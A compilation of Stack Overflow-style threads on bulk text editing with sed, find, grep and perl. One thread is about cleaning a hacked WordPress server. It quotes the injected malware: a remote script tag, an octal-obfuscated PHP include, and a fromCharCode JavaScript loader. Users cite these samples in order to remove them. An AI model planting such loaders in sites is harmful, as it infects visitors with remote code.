Replacing a line from multiple files, limiting to a line number range - bash

I have a large number of files and I want to replace some lines from all of these files. I don't know the exact contents of the lines, all I know is all of them contain two known words - let's say for example 'Programmer' and 'Bob'. So the lines I want to replace could be something like:
Created by Programmer Bob
Programmer extraordinaire Bob, such an awesome guy
Copyright programmer bob, all rights reserved
So far this sounds easy, but the problem is I only want to replace the lines that are contained within a line range - for example in the beginning of the file (where typically one would find comments regarding the file). I can't replace lines found in the later parts of the file, because I don't want to accidentally replace actual code.
So far I have tried:
find . -exec grep -il -E 'Programmer.*Bob' {} \; | xargs sed -i '1,10 /Programmer.*Bob/Ic\LINE REPLACED'
(I'm using find because grep ran into an infinite recursion - I think. Not the point here.)
However it seems that I can't use address ranges with c\ (change line). Feel free to point out any syntax errors, but I think I've tried everything to no avail. This does work without the line numbers.
EDIT:
I got the answer, but I decided to edit my question to include my solution which expands upon the answer I got - maybe someone will find this helpful.
I realised later that I want to retain the possible whitespace and comment characters in the beginning of the line. I accomplished it using this command:
find . -exec grep -ilI '.*Programmer.*Bob.*' {} \; | xargs sed -i -r '1,10 s/([ \t#*]*)(.*Programmer.*Bob.*)/\1LINE REPLACED/I'
\1 keeps the text matched by [ \t#*]*. An explicit ^ anchor is not needed: sed takes the leftmost match, and because .* can absorb any text before Programmer, the match always starts at the beginning of the line. So a line such as
** Text I don't want to remove ** Programmer Bob
becomes
** LINE REPLACED
with only the leading whitespace and comment characters kept. (I also added the -I (capital i) flag to the grep command, which skips binary files.)
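To check how the capture group treats a line like the one above, here is a minimal sketch. It assumes GNU sed (for -r, \t inside brackets and the I flag) and feeds a single sample line through the same substitution, without the 1,10 address:

```shell
# Assumes GNU sed (-r for extended regex, I for case-insensitive matching).
line="** Text I don't want to remove ** Programmer Bob"

# Same substitution as in the command above, applied to one line from stdin.
result=$(printf '%s\n' "$line" |
  sed -r 's/([ \t#*]*)(.*Programmer.*Bob.*)/\1LINE REPLACED/I')

printf '%s\n' "$result"
```

On GNU sed this prints "** LINE REPLACED": the match starts at the first character, \1 captures only the leading "** ", and the .* in front of Programmer swallows the rest of the line.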

You are mixing addresses and commands. Simple substitution should work:
find . -exec grep -il -E 'Programmer.*Bob' {} \; \
| xargs sed -i '1,10 s/.*Programmer.*Bob.*/LINE REPLACED/'
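As a rough illustration of the address range, the sketch below builds a throwaway file in which the pattern occurs on line 2 (a header comment) and again on line 12 (code). The file name and contents are made up, GNU sed is assumed, and the I flag is an addition here so that lowercase variants would match too:

```shell
# Assumes GNU sed (for -i without a suffix and the I flag).
workdir=$(mktemp -d)
demo="$workdir/demo.c"

# Line 2 is a header comment; line 12 is "code" that also matches the pattern.
{
  echo "/*"
  echo " * Created by Programmer Bob"
  echo " */"
  for n in 4 5 6 7 8 9 10 11; do echo "int filler_$n;"; done
  echo 'char *author = "Programmer Bob";'
} > "$demo"

# The 1,10 address restricts the s command to the first ten lines.
sed -i '1,10 s/.*Programmer.*Bob.*/LINE REPLACED/I' "$demo"

header_line=$(sed -n '2p' "$demo")
code_line=$(sed -n '12p' "$demo")
printf '%s\n%s\n' "$header_line" "$code_line"
rm -rf "$workdir"
```

Only the header line is rewritten; the matching line outside the range is left alone.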

find . -type f -name "*.cpp" | xargs perl -pi -e 'if (/Programmer/ && /Bob/ && $. <= 10) { $_ = "line to replace\n" } close ARGV if eof'

sed command:
sed '1,10 {s/programmer\|bob/LINE REPLACED/i;s/programmer\|bob//ig}' file

Related

How to replace whole string using sed or possibly grep

My whole server got hacked or infected with malware. My site is based on WordPress, and the majority of sites hosted on my server are WordPress based. The attacker added this line of code to every single file and to the database:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string in a single file, index.php, first, so I know it works.
I know my command is wrong. Please help me with this.
I tried #Eran's code and it deleted the whole line, which is good and as expected. However, the full injected code is this:
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
#slybloty's solution is easy, though, and it worked.
So, to remove the code fully from all the affected files, I'm running the following 3 commands. Thanks to all of you for this.
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the #include line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.
Now I still need to track down the junk files and any remaining traces.
The hacker's script also added this JS code:
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - find
-type f - only files
-name '*.php' - whose names end with .php
-print0 - print them separated by zero bytes
| xargs -0 - for each file separated by zero byte
-P7 - run 7 processes concurrently
-n1 - for each one file
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run from other answers.
You may want to add the -t option to xargs to see the progress. See man find and man xargs (http://man7.org/linux/man-pages/man1/xargs.1.html).
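The pipeline described above can be tried on a scratch directory first. This is only a sketch: the file names and the s/foo/bar/ script are placeholders, and GNU find, xargs and sed are assumed.

```shell
# Assumes GNU find, xargs and sed; file names and the sed script are hypothetical.
workdir=$(mktemp -d)
mkdir -p "$workdir/site/sub dir"
echo "foo one" > "$workdir/site/a.php"
echo "foo two" > "$workdir/site/sub dir/b c.php"   # spaces in the path
echo "foo three" > "$workdir/site/notes.txt"       # not a .php file

# -print0 / -0 keep names with spaces intact; -P7 -n1 runs up to 7 seds, one file each.
find "$workdir/site" -type f -name '*.php' -print0 |
  xargs -0 -P7 -n1 sed -i 's/foo/bar/'

php_a=$(cat "$workdir/site/a.php")
php_b=$(cat "$workdir/site/sub dir/b c.php")
txt=$(cat "$workdir/site/notes.txt")
printf '%s\n%s\n%s\n' "$php_a" "$php_b" "$txt"
rm -rf "$workdir"
```

Both .php files are edited, including the one whose path contains spaces, while the .txt file is never passed to sed.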
Single quotes are taken literally without escape characters.
In var='hello\'', you have an un-closed quote.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed's s command accepts almost any character as its delimiter. Since you have slashes in the pattern, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This is ordinary shell quoting and works in any POSIX shell, not just bash.
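The '\'' sequence can be tried in isolation before using it in a long sed command. A minimal sketch with made-up sample strings:

```shell
# '\'' closes the quoted string, adds an escaped quote, and reopens the string.
escaped='it'\''s'
# The double-quoted form is equivalent and easier to read.
double="it's"

# The same trick inside a sed script: replace 'x' (with its quotes) by 'y'.
replaced=$(printf '%s\n' "src='x'" | sed 's/'\''x'\''/'\''y'\''/')

printf '%s\n%s\n%s\n' "$escaped" "$double" "$replaced"
```

Both variables hold the same three characters plus the quote, and the sed call turns src='x' into src='y'.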
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
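For comparison, here is a sketch of the first method with commas as the delimiter and the angle brackets left unescaped, run against a throwaway file. The sample index.php contents are invented for the demo and GNU sed is assumed for -i:

```shell
# Assumes GNU sed; the index.php contents below are a made-up sample.
workdir=$(mktemp -d)
cat > "$workdir/index.php" <<'EOF'
<?php echo "hi"; ?>
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script><p>content</p>
EOF

# Double quotes outside, single quotes inside, commas as the s delimiter.
sed -i "s,<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>,,g" "$workdir/index.php"

remaining=$(grep -c 'trasnaltemyrecords' "$workdir/index.php" || true)
second_line=$(sed -n '2p' "$workdir/index.php")
printf '%s\n%s\n' "$remaining" "$second_line"
rm -rf "$workdir"
```

The script tag is removed and the rest of the line is kept.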
Edit: Please see #EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. GNU version of sed should have this. I'm also making the assumption that this code always appears in the format being 6 lines long
while read -r filename; do
# .bak optional here if you want to back up any files that are edited
sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g' "$filename"
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything up to a line feed, and then the line feed itself, which avoids greedy regex matching. Because we aren't splitting on line feeds (-z), a regex such as var pl = String\.fromCharCode(104,116,116,112,115.*\n}\n would match the largest possible span. For example, if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Thus, repeating this sequence 6 times matches to the end of the first line as well as the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that have the matching pattern. This way, sed isn't editing every file. Without this, -i.bak (not plain -i) would make a mess.
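The approach can be rehearsed on a scratch file before touching real data. The sketch below assumes GNU sed and grep; the app.js file, its shortened character-code list and the two "keep" lines are made up for the demo.

```shell
# Assumes GNU sed (-z) and GNU grep; app.js and its contents are hypothetical.
workdir=$(mktemp -d)
cat > "$workdir/app.js" <<'EOF'
console.log("keep 1");
var pl = String.fromCharCode(104,116,116,112,115,58,47,47); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
console.log("keep 2");
EOF

marker='var pl = String\.fromCharCode(104,116,116,112,115'

# Collect the list of infected files first, then edit each one in place.
files=$(grep -lr "$marker" "$workdir")
printf '%s\n' "$files" | while IFS= read -r filename; do
  [ -n "$filename" ] || continue   # nothing matched
  sed -zi.bak "s/${marker}[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g" "$filename"
done

cleaned=$(cat "$workdir/app.js")
backup=no
[ -f "$workdir/app.js.bak" ] && backup=yes
printf '%s\n' "$cleaned"
rm -rf "$workdir"
```

Only the six injected lines disappear; the lines before and after them survive, and the original is kept as app.js.bak.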
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today, all page posts got this nasty virus script added
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I disabled it in the database with
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
At least my files are not infected;
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not find anything, but I have no idea how this got into the database, which worries me.
This infection caused redirects on pages; Chrome mostly detects and blocks this. I did not notice anything strange in /wp-mail-smtp/src/Debug.php.
This worked for me:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search *.js, *.json and *.map files.
I've got the same thing today, all page posts got the script added.
I handled them successfully by using the Search and replace plugin.
Moreover, I also found one record in the wp_posts table whose post_content column contained the
following string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

How do I use grep to scan a folder of .scss files and remove the first line if it is blank?

I am getting into linux and optimizing my workflow and would love an example. I have a whole bunch of .scss inside of nested folders and I need to check if the first line is blank, and if so delete it, then re-save the file. I'm working on windows at work, but like writing bash. I've experimented with :
grep -r "/^\n/"
But seems to return every blank line. Then I'm not too sure how to delete it and then re-save.
This may get you started:
find . -name '*.scss' -exec sed -i.bak '1{/^$/d}' {} \;
To understand this command, we can break it into two parts:
find . -name '*.scss' -exec ... \;
Starting with the current directory, this looks recursively for files with names ending with .scss and, when it finds one, it runs the command that follows -exec on it.
sed -i.bak '1{/^$/d}' {}
sed is a stream editor. The option -i.bak tells it to change files in-place, leaving behind a backup file. Before find runs this command, it will replace {} with the actual name of the file that it found.
1{...} tells sed to select the first line of the file and apply to it the commands in braces.
/^$/ is a regular expression. It matches a line if the line is empty.
d tells sed to delete any matching line.
So, let's put that all together: if the first line of the file is empty, sed deletes it.
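To see the effect without risking real stylesheets, the command can be run on a scratch tree. This is a sketch under assumptions: GNU sed, and a made-up directory layout with one file that starts with a blank line and one that does not.

```shell
# Assumes GNU sed; the directory layout and file contents are hypothetical.
workdir=$(mktemp -d)
mkdir -p "$workdir/styles/partials"
printf '\n.a { color: red; }\n\n.b { color: blue; }\n' > "$workdir/styles/main.scss"
printf '.c { margin: 0; }\n\n.d { margin: 1px; }\n' > "$workdir/styles/partials/_base.scss"

# Delete line 1 only when it is empty; later blank lines are untouched.
find "$workdir" -name '*.scss' -exec sed -i.bak '1{/^$/d}' {} \;

main_first=$(head -n 1 "$workdir/styles/main.scss")
main_lines=$(wc -l < "$workdir/styles/main.scss" | tr -d ' ')
base_lines=$(wc -l < "$workdir/styles/partials/_base.scss" | tr -d ' ')
printf '%s\n%s\n%s\n' "$main_first" "$main_lines" "$base_lines"
rm -rf "$workdir"
```

main.scss loses its leading blank line (4 lines become 3), while _base.scss, whose first line is not blank, keeps all 3 lines including the blank one in the middle.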
You will find many tutorials on the web on both find and sed. You can find detailed information on either using man find or man sed.
You don't use grep to edit files; you should use sed.
https://www.gnu.org/software/sed/manual/sed.html

Unix scripting in bash to search logs and return a specific part of a specific log file

Dare I say it, I am mainly a Windows person (please don't shoot me down too soon), although I have played around in Linux in the past (mostly command line).
I have a process I have to go through once in a while which is in essence searching all log files in a directory (and sub directories) for a certain filename and then getting something out of said log file.
My first step is
grep -Ril <filename or Partial filename you are looking for> log/*.log
From that I have the log filename and I vi that to find where it occurs.
To clarify: that grep is looking through all log files seeing if the filename after the -Ril occurs within them.
vi log/<log filename>
/<filename or Partial filename you are looking for>
I do j a couple of times to find CDATA, and then I have a URL I need to extract, then in putty do a select, copy and paste it into a browser.
Then I quit vi without saving.
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.2
Fred.2
start grep
end grep
Renamed to Fred.2.20150831140931
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l1703775&sp=l1703775</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.2.20150831140931&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
----------------------------------------------------------------------------------------
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.3
Fred.3
start grep
end grep
Renamed to Fred.3.20150999999999
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l999999&sp=l9999999</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.3.20150999999999&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
What I want to grab is the URL in CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999] for Fred.3.20150999999999 indicated by the line Renamed to Fred.3.20150999999999.
Is this possible? (And I do apologise by the XML formatting, but it is exactly as it is in the log file.)
Thanks in advance,
Tel
sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p' <logfile>
-n suppress automatic printing of pattern space
# - as sed pattern delimiter
( ) - grouping the patterns
\2 - second pattern
p - print
Update - grep file pattern
grep -Ril <filename or Partial filename you are looking for> log/*.log | xargs sed -n "/<pattern>/,/filePath=/p" | sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p'
xargs takes output of previous command as input file.
If pattern is Fred.3.20150999999999, first sed will print from matched pattern to filePath= and next sed will extract CDATA in it.
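The two-stage sed can be checked against a cut-down log. In this sketch the log content is abbreviated and the host name host.example and its paths are placeholders, not values from the original log:

```shell
# The log below is a shortened, hypothetical version of the one in the question.
workdir=$(mktemp -d)
log="$workdir/fred.log"
cat > "$log" <<'EOF'
Renamed to Fred.2.20150831140931
<runResponse><value><![CDATA[https://host.example:8443/report?id=1&sp=l1703775]]></value></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.2.20150831140931
----------------------------------------
Renamed to Fred.3.20150999999999
<runResponse><value><![CDATA[https://host.example:8443/report?id=2&sp=l999999]]></value></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.3.20150999999999
EOF

# Stage 1 prints only the block for the wanted file; stage 2 pulls out the CDATA body.
url=$(sed -n '/Renamed to Fred\.3\.20150999999999/,/filePath=/p' "$log" |
  sed -n 's#.*CDATA\[\(.*\)\]\].*#\1#p')

printf '%s\n' "$url"
rm -rf "$workdir"
```

Only the URL belonging to the Fred.3 entry is printed, even though the earlier entry has a CDATA section too.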
While your grep command may be used to locate the file, the find command is quite a bit more flexible and a bit more appropriate. The basic use to locate your log file would be similar to:
find /path/to/logdir -type f -name "partial*.log"
Which will recursively search under /path/to/logdir for a file -type f whose name matches the pattern "partial*.log".
Isolating the url can be similar to the other answer, but here using multiple expressions, you can isolate the url with:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' <logfilename> \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Output:
https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775
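Where the first expression isolates the url itself from within your <logfilename>, the second suppresses any blank lines, and the third removes any fragments beginning with a [space, tab or newline]. Note that lines on which the substitution does not match are printed unchanged unless one of the delete expressions removes them; running sed with -n and adding the p flag to the substitution limits the output to the url lines.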
If you can tune your find command to reliably return the exact file you need to retrieve the url from, then you can write your find and sed command together as:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' \
$(find /path/to/logdir -type f -name "partial*.log") \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Where you have simply used command substitution to replace <logfilename> with the find command enclosed in $(...).
Note there are many different ways to write the sed substitution, some probably more elegant than this one, but that is where the power lies in sed. Give this a try and let me know if you run into problems. I hope this helps.

How to overwrite the contents in the sed, without having backup file

I have a command like this:
sed -i -e '/console.log/ s/^\/*/\/\//' *.js
which comments out all console.log statements. But there are two things:
It keeps a backup file like test.js-e, which I don't want.
Say I want to apply the same process recursively to a folder; how do I do it?
You don't need the -e option in this particular case; it seems to be taken as the backup suffix for -i, which is where test.js-e comes from. That is how BSD/macOS sed parses -i, so if dropping -e alone does not help there, pass an explicit empty suffix (-i '').
For the 2nd part, you can try something like this:
find . -type f -name "*.js" -exec sed -i '/console.log/ s/^\/*/\/\//' {} +
Use find to recursively find all .js files and do the replacement.
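A quick way to rehearse the recursive replacement is to run it on a scratch tree. The sketch assumes GNU sed (plain -i, no backup) and uses made-up file names:

```shell
# Assumes GNU sed; on BSD/macOS sed, -i would need an explicit suffix argument.
workdir=$(mktemp -d)
mkdir -p "$workdir/src/lib"
printf 'console.log("a");\nvar x = 1;\n' > "$workdir/src/app.js"
printf '//console.log("b");\n' > "$workdir/src/lib/util.js"

# Prefix every console.log line with //, replacing any slashes already there.
find "$workdir" -type f -name '*.js' -exec sed -i '/console\.log/ s/^\/*/\/\//' {} +

app=$(cat "$workdir/src/app.js")
util=$(cat "$workdir/src/lib/util.js")
backups=$(find "$workdir" -type f ! -name '*.js' | wc -l | tr -d ' ')
printf '%s\n%s\n' "$app" "$util"
rm -rf "$workdir"
```

The uncommented call gains a leading //, the already commented one is unchanged, other lines are untouched, and no backup files are left behind.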
When checking sed's help, -i takes a suffix and uses it as a backup,
-i[SUFFIX], --in-place[=SUFFIX]
edit files in place (makes backup if SUFFIX supplied)
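and the backup appears to be the original file name plus -e, the argument that follows -i, so your sed is consuming -e as the suffix. Attaching the e directly (-ie) would not help, since that just makes e the suffix; if your sed requires a suffix argument (as BSD/macOS sed does), pass an empty one instead:
sed -i '' '/console.log/ s/^\/*/\/\//' *.js
As for the recursion, you could use find with -exec or xargs. Please adjust the find command and test it before running -exec (drop the '' if you are on GNU sed):
find . -name '*.js' -type f -exec sed -i '' '/console.log/ s/^\/*/\/\//' {} \;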
From your original post I presume you just want to turn a leading C-style comment opener like:
/*
into a double-slash style like:
//
right?
Then you can do it with this command
find . -name "*.js" -type f -exec sed -i '/console.log/ s#^/\*#//#g' '{}' \;
Be aware that:
In sed the delimiter is normally /, but if you find it annoying to escape every / in your pattern or replacement, you can change the delimiter to # or | as you like. I find this a very useful trick.
If what you want to do is what I presumed, be sure to escape the * character, because the regex /* means "match / zero or more times", which matches at the start of every line. That is very dangerous!
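The difference between the escaped and unescaped star is easy to see on a single line. A small sketch with made-up input lines:

```shell
line='var x = 1;'

# Unescaped: /* means "zero or more slashes", so it matches the empty string at ^.
unescaped=$(printf '%s\n' "$line" | sed 's#^/*#//#')
# Escaped: \* is a literal star, so only a real /* opener matches.
escaped=$(printf '%s\n' "$line" | sed 's#^/\*#//#')
comment=$(printf '%s\n' '/* note */' | sed 's#^/\*#//#')

printf '%s\n%s\n%s\n' "$unescaped" "$escaped" "$comment"
```

The unescaped pattern turns ordinary code into a comment (//var x = 1;), while the escaped one leaves it alone and only rewrites the line that really starts with /*.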

command line script to indent

I am looking for a simple command line script or shell script I can run that, with a given directory, will traverse all directories, sub directories and so on looking for files with .rb and indent them to two spaces, regardless of current indentation.
It should then look for html, erb and js files (as well as less/sass) and indent them to 4.
Is this something that's simple or am I just over-engineering it? I don't know bash that well. I have tried to create something before, but my friend said to use grep and I am lost. Any help?
If you've got GNU sed with the -i option to overwrite the files (with backups for safety), then:
find . -name '*.rb' -exec sed -i.bak 's/^/  /' {} +
find . -name '*.html' -exec sed -i.bak 's/^/    /' {} +
Etc.
The find generates the list of file names; it executes the sed command, backs up the files (-i.bak; GNU sed needs the suffix attached directly to -i) and does the appropriate substitutions as requested. The + means 'do as many files at one time as is convenient'. This avoids problems with spaces in file names, amongst other issues.
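A sketch of the same idea on a scratch tree, assuming GNU sed and made-up file names. Note that s/^/  / adds two spaces in front of whatever indentation is already there rather than normalising it:

```shell
# Assumes GNU sed; the directory layout and file contents are hypothetical.
workdir=$(mktemp -d)
mkdir -p "$workdir/app/views"
printf 'def hi\nputs 1\nend\n' > "$workdir/app/model.rb"
printf '<p>\nhi\n</p>\n' > "$workdir/app/views/index.html"

# Two spaces for Ruby files, four for HTML; originals are kept as *.bak.
find "$workdir" -name '*.rb' -exec sed -i.bak 's/^/  /' {} +
find "$workdir" -name '*.html' -exec sed -i.bak 's/^/    /' {} +

rb_first=$(head -n 1 "$workdir/app/model.rb")
html_first=$(head -n 1 "$workdir/app/views/index.html")
rb_backup=$(head -n 1 "$workdir/app/model.rb.bak")
printf '%s\n%s\n%s\n' "$rb_first" "$html_first" "$rb_backup"
rm -rf "$workdir"
```

To force a fixed indent regardless of what is there, the pattern could be widened to something like s/^[[:space:]]*/  /, at the cost of flattening any nesting; whether that is acceptable depends on the files.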

Resources